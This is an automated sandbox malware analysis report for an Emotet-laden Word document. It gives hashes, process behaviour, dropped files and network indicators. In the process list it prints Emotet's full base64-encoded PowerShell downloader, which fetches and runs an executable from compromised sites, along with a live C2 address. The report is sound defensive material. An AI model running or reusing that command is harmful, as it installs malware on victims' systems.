analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

INC_OT6DPZ3OWF0KCV_SHK_09192019.doc

Full analysis: https://app.any.run/tasks/7c01b88e-dbe2-40ac-808d-8b1e872bcca7
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Malware Trends Tracker     >>>
Analysis date: September 19, 2019, 10:39:48
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
emotet-doc
emotet
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Triple-buffered New Hampshire, Subject: Ergonomic Wooden Car, Author: Rosina Rowe, Comments: Fall tan, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Sep 19 07:46:00 2019, Last Saved Time/Date: Thu Sep 19 07:46:00 2019, Number of Pages: 1, Number of Words: 95, Number of Characters: 547, Security: 0
MD5:

2D46AA86A46A424F66E8A72FF975BBDF

SHA1:

BCCEE59D492C1A5EEEA7BC54B3F2EB03BFEFE2EE

SHA256:

47C0ADBB3E78AA5317BA38CA2DCA6182C468CECD3BC868CFCDC24D3F5434D1CA

SSDEEP:

6144:zXSY2WaPaQxUk+MclQDgQOaPLkI27NSU4jJntATfDeTPsOupth:zCY2WaPaQxUk+MclQDgQO4X27NSU4VeF

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 572.exe (PID: 3028)
      • 572.exe (PID: 3136)
      • 572.exe (PID: 3724)
      • 572.exe (PID: 3944)
      • easywindow.exe (PID: 3952)
      • easywindow.exe (PID: 2420)
      • easywindow.exe (PID: 2880)
      • easywindow.exe (PID: 3788)

    • Emotet process was detected

      • 572.exe (PID: 3944)

  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 2416)

    • Executed via WMI

      • powershell.exe (PID: 2416)

    • PowerShell script executed

      • powershell.exe (PID: 2416)

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2416)
      • 572.exe (PID: 3944)

    • Application launched itself

      • easywindow.exe (PID: 3952)

    • Starts itself from another location

      • 572.exe (PID: 3944)

    • Connects to server without host name

      • easywindow.exe (PID: 3788)

  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3528)

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3528)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: Triple-buffered New Hampshire
Subject: Ergonomic Wooden Car
Author: Rosina Rowe
Keywords: -
Comments: Fall tan
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2019:09:19 06:46:00
ModifyDate: 2019:09:19 06:46:00
Pages: 1
Words: 95
Characters: 547
Security: None
CodePage: Windows Latin 1 (Western European)
Company: Raynor LLC
Lines: 4
Paragraphs: 1
CharCountWithSpaces: 641
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
Manager: Greenholt
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
44
Monitored processes
10
Malicious processes
3
Suspicious processes
3

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs powershell.exe 572.exe no specs 572.exe no specs 572.exe no specs #EMOTET 572.exe easywindow.exe no specs easywindow.exe no specs easywindow.exe no specs easywindow.exe

Process information

PID
CMD
Path
Indicators
Parent process
3528"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\INC_OT6DPZ3OWF0KCV_SHK_09192019.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2416powershell -encod JABwADgAMQBUAFkAagBJAEgAPQAnAHoAdQBQADUAUwBVADQAdQAnADsAJABrADQANwBwAHAATQA2AEkAIAA9ACAAJwA1ADcAMgAnADsAJABsADUAMABvAHIAagBZAD0AJwBkADEAaQA5AEUAUABqAEEAJwA7ACQASgBXAFQAcwBtAHMAcgBYAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABrADQANwBwAHAATQA2AEkAKwAnAC4AZQB4AGUAJwA7ACQAZABrAEsANAAyADkAPQAnAFQAVgBUAEsAagBGACcAOwAkAEsAbwBaAFoAOQBLADkAdgA9ACYAKAAnAG4AZQB3ACcAKwAnAC0AbwAnACsAJwBiAGoAZQBjACcAKwAnAHQAJwApACAAbgBFAHQALgB3AGUAYgBDAGwASQBFAE4AVAA7ACQASwBiAEwAagBPAEcAcgB6AD0AJwBoAHQAdABwAHMAOgAvAC8AYQBuAGkAdgBlAG4AdAB1AHIAZQAuAGMAbwAuAHUAawAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBhAGIAeQBPAHIARQBTAEQALwBAAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAHMAdAByAHUAYwB0AHUAcgBlAHMALQBtAGEAZABlAC0AZQBhAHMAeQAuAGMAbwAuAHUAawAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAEMAUABtAEIAVABtAHQATwAvAEAAaAB0AHQAcABzADoALwAvAG8AZgBmAHMAaQBkAGUAMgAuADAAMAAwAHcAZQBiAGgAbwBzAHQAYQBwAHAALgBjAG8AbQAvAHMAZQBrAGkAbABsAGUAcgAvAHgAQwBWAGwAUAB4AEgAWQAvAEAAaAB0AHQAcABzADoALwAvAHAAcgBhAG0AbwBkAGsAdQBtAGEAcgBzAGkAbgBnAGgALgAwADAAMAB3AGUAYgBoAG8AcwB0AGEAcABwAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwAwAHAAagBxAF8AdQBvAGcAcQBqADUANwBoADEALQA1ADEAMQA4ADcAMAA0ADIAOQAwAC8AQABoAHQAdABwADoALwAvAGgAZQBhAGwAdABoAGsAbgBvAHcAbABlAGQAZwBlAC4AbQB5AC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AZwBpADcAagBlAGEAbwBsADQAbQBfADAAYwBrAGUAMQBxADAAeQAtADcANgAvACcALgAiAHMAYABwAEwAaQBUACIAKAAnAEAAJwApADsAJABDADMAcABzAEEAdgA9ACcAUwBLAFEAUgB6AEMAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFcARABoAE0AaQA5AGEAIABpAG4AIAAkAEsAYgBMAGoATwBHAHIAegApAHsAdAByAHkAewAkAEsAbwBaAFoAOQBLADkAdgAuACIARABPAGAAdwBOAEwAbwBgAEEAYABkAEYASQBsAGUAIgAoACQAVwBEAGgATQBpADkAYQAsACAAJABKAFcAVABzAG0AcwByAFgAKQA7ACQAVwBkAFMAOQBqAEEASAByAD0AJwBBAGgAcgBZAFEAWQB3ACcAOwBJAGYAIAAoACgAJgAoACcARwBlAHQALQBJAHQAJwArACcAZQAnACsAJwBtACcAKQAgACQASgBXAFQAcwBtAHMAcgBYACkALgAiAEwAZQBgAE4AZwB0AGgAIgAgAC0AZwBlACAAMgAwADEAMQA0ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAYABUAEEAUgBUACIAKAAkAEoAVwBUAHMAbQBzAHIAWAApADsAJABSAG0ARwB6AFUAOABoAD0AJwBSAE4AVgBpAGEAdQBHAHcAJwA7AGIAcgBlAGEAawA7ACQAQwB2ADkAbwBqAHUAdAA9ACcAdQAzAGoAegAyAEoAaAAxACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAGgAbQBpAGEAXwB0AFEAPQAnAE4AbwBLAGwAaABmAEoANQAnAA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3724"C:\Users\admin\572.exe" C:\Users\admin\572.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3028"C:\Users\admin\572.exe" C:\Users\admin\572.exe572.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3136--fb4ffeeeC:\Users\admin\572.exe572.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3944--fb4ffeeeC:\Users\admin\572.exe
572.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3952"C:\Users\admin\AppData\Local\easywindow\easywindow.exe"C:\Users\admin\AppData\Local\easywindow\easywindow.exe572.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2880"C:\Users\admin\AppData\Local\easywindow\easywindow.exe"C:\Users\admin\AppData\Local\easywindow\easywindow.exeeasywindow.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2420--fd47f3b8C:\Users\admin\AppData\Local\easywindow\easywindow.exeeasywindow.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3788--fd47f3b8C:\Users\admin\AppData\Local\easywindow\easywindow.exe
easywindow.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events
1 768
Read events
1 277
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
10
Text files
0
Unknown types
43

Dropped files

PID
Process
Filename
Type
3528WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR9BB8.tmp.cvr
MD5:
SHA256:
3528WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\54733B46.wmfwmf
MD5:7E0E936ED97756F5CE75968998931F2E
SHA256:7C30DDCC369AC22874F2E088CA706C72069C84250774B9DB313CA7144FADEA9E
3528WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CC44F678.wmfwmf
MD5:1C9AD3433500E8654A9948525D71C6F4
SHA256:728B3198F282E8EB2D272BE8CAC1117347783681175B55BFA06C23E2A71A4628
3528WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6AC8AF44.wmfwmf
MD5:F4DC3537E2AE811B58589DDA9A0B70CC
SHA256:A080D839526B2F4CE70EE826676973E5D3BC082DFBB2293F7461DAC5EA99444B
3528WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$C_OT6DPZ3OWF0KCV_SHK_09192019.docpgc
MD5:34B02D905146BD1A91A9DF7052DE1D6D
SHA256:F01C593236EED9E14069C0A4684CCFC30275AE730BBA0E84581F5436E6910981
3528WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:62F2DA178DD59EBA6B61EE250E55F925
SHA256:8CF938206B83D51659082A32A71F3A9F077217F5A2E07A98541350C60245A244
3528WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exdtlb
MD5:98A204141EC4CB175E3E91EB334EAD6C
SHA256:27C53516D16F71AD745F2CBA9F45E029CF53ACD3C20B0470A19374FEBF1DC654
3528WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1B62F228.wmfwmf
MD5:82C8EEBFBFED9423F8F171A906619040
SHA256:C5F5A13A11A3E73647B50A77094F4C4E24DCF70F19B828E433169D92BB336379
3528WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5FB7411C.wmfwmf
MD5:F84D1687F62242059901D6052216473C
SHA256:0E8337B6AAB308C579461A2D8B54FC935E8EE868CFB14E2EE81B0F6E4168F9A3
3528WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\93906ED0.wmfwmf
MD5:392AFC26B9CFAE2CE4325A4598D5A536
SHA256:35EF8B83731C9E46A3DA3847F7D13495AC548C9C99DFCB063DD81DCD2C42BAA1
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
2
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3788
easywindow.exe
POST
190.18.146.70:80
http://190.18.146.70/guids/
AR
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
190.18.146.70:80
CABLEVISION S.A.
AR
malicious
2416
powershell.exe
104.28.19.13:443
aniventure.co.uk
Cloudflare Inc
US
shared

DNS requests

Domain
IP
Reputation
aniventure.co.uk
  • 104.28.19.13
  • 104.28.18.13
malicious

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
INC_OT6DPZ3OWF0KCV_SHK_09192019.doc